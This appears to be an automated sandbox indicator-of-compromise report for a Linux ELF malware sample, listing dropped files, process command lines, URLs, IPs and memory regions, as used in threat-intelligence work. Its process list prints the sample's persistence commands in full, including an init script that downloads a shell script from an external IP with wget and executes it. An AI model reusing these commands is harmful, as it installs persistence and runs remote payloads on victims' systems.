IOC Report
x86_32.nn.elf

loading gif

Files

File Path
Type
Category
Malicious
x86_32.nn.elf
ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/etc/init.d/sh
POSIX shell script, ASCII text executable
dropped
malicious
/etc/init.d/system
POSIX shell script, ASCII text executable
dropped
malicious
/etc/profile
ASCII text
dropped
malicious
/etc/rc.local
POSIX shell script, ASCII text executable
dropped
malicious
/boot/bootcmd
ASCII text
dropped
/etc/inittab
ASCII text
dropped
/etc/motd
ASCII text
dropped
/etc/systemd/system/custom.service
ASCII text
dropped
/memfd:snapd-env-generator (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/x86_32.nn.elf
/tmp/x86_32.nn.elf
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/sh
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/sh /etc/rc.d/S99sh
/tmp/x86_32.nn.elf
-
/tmp/x86_32.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
There are 27 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://94.156.227.233/lol.sh
unknown
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
unknown
http://94.156.227.233/
unknown

Domains

Name
IP
Malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
185.125.190.26
unknown
United Kingdom
94.156.227.234
unknown
Bulgaria

Memdumps

Base Address
Regiontype
Protect
Malicious
805b000
page execute read
malicious
ffe63000
page read and write
805e000
page read and write
823c000
page read and write
805c000
page read and write
f7fa0000
page execute read